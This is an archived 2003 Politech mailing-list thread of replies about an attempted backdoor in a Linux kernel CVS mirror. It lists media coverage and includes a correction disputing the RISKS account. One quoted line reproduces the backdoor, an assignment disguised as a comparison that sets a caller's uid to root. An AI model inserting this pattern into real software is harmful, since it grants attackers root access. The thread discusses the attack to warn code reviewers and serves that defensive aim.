--- Date: Wed, 12 Nov 2003 17:45:22 -0500 To: Declan McCullagh <declan@private> From: "Robert E. Jones, III" <rjones@private> Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from RISKS In-Reply-To: <6.0.0.22.2.20031112153041.021dbdb0@private> Declan - Long time politech member but only the second time I have written about an article. Not to nit-pick on an otherwise fine email, but the poster is somewhat wrong in that at least News.com picked up on the story http://news.com.com/2100-7355-5103670.html I consider News.com to be fairly "mainstream" even if not one of the larger news organizations. Of course, Slashdot picked up on it and frankly, if you go just on sheer number of hits, Slashdot is about as mainstream as it gets. http://slashdot.org/articles/03/11/06/058249.shtml?tid=106&tid=185 Thanks Rob Jones --- To: Declan McCullagh <declan@private> Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from RISKS In-Reply-To: <6.0.0.22.2.20031112153041.021dbdb0@private> (Declan McCullagh's message of "Wed, 12 Nov 2003 15:31:04 -0500") From: Russ Allbery <rra@private> Organization: The Eyrie Date: Wed, 12 Nov 2003 15:11:49 -0800 Declan McCullagh <declan@private> writes: > Date: Tue, 11 Nov 2003 09:21:16 -0600 > From: "Douglas W. Jones" <jones@private> > Subject: Thwarted Linux backdoor > On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor > into Linux was averted. This is a really good example of the subtle > kinds of hacks a source code examiner must be waiting to catch if we > want genuinely secure voting systems under the current model of > proprietary DRE systems with a closed-door source code examination. > Someone broke into a server at kernel.kbits.net and inserted the > following code into the Linux kernel: > if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) > retval = -EINVAL; > This was done in the code sys_wait4(). Larry McVoy caught the fact that > the change had been made, and was annoyed because it wasn't logged > properly. Matthew Dharm asked "Out of curiosity, what were the changed > lines." Zwane Mwaikambo responded "That looks odd", and Andries Brouwer > responded "Not if you hope to get root." Wow, that's a bunch of nonsense. The code in question was injected into a read-only export of the kernel as a CVS tree, which is only there for the convenience of CVS users. It is used only for reference, not to do active kernel development, and no releases are done from that tree. In other words, there's really no credible path whereby this code could have gotten into an actual release of Linux. The bug was never introduced into the actual working kernel source as the above implies. Larry McVoy was not annoyed that it wasn't logged properly; he was investigating why there was code in the read-only CVS export which wasn't actually in the main kernel repository. The person writing up this problem for RISKS clearly didn't actually understand it. -- Russ Allbery (rra@private) <http://www.eyrie.org/~eagle/> --- Date: Wed, 12 Nov 2003 18:01:41 -0300 From: Claudio Gutiérrez <gutierrezclaudio@private> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5) Gecko/20031013 Thunderbird/0.3 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Declan McCullagh <declan@private> Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from >This attack has only made the mainstream media in one place, so far: > http://www.smh.com.au/articles/2003/11/07/1068013371170.html > Bid to backdoor Linux kernel detected - smh.com.au >This is a pity, because I think this story is really important. The attack was also reported on MSNBC, InfoWorld, The Register, Computerworld and SecurityFocus http://www.msnbc.com/news/990343.asp?cp1=1 http://www.infoworld.com/article/03/11/07/HNlinuxattack_1.html http://www.theregister.co.uk/content/55/33855.html http://www.computerworld.com/softwaretopics/os/linux/story/0,10801,86946,00.html http://www.securityfocus.com/news/7388 _______________________________________________ Politech mailing list Archived at http://www.politechbot.com/ Moderated by Declan McCullagh (http://www.mccullagh.org/)
This archive was generated by hypermail 2b30 : Wed Nov 12 2003 - 22:54:15 PST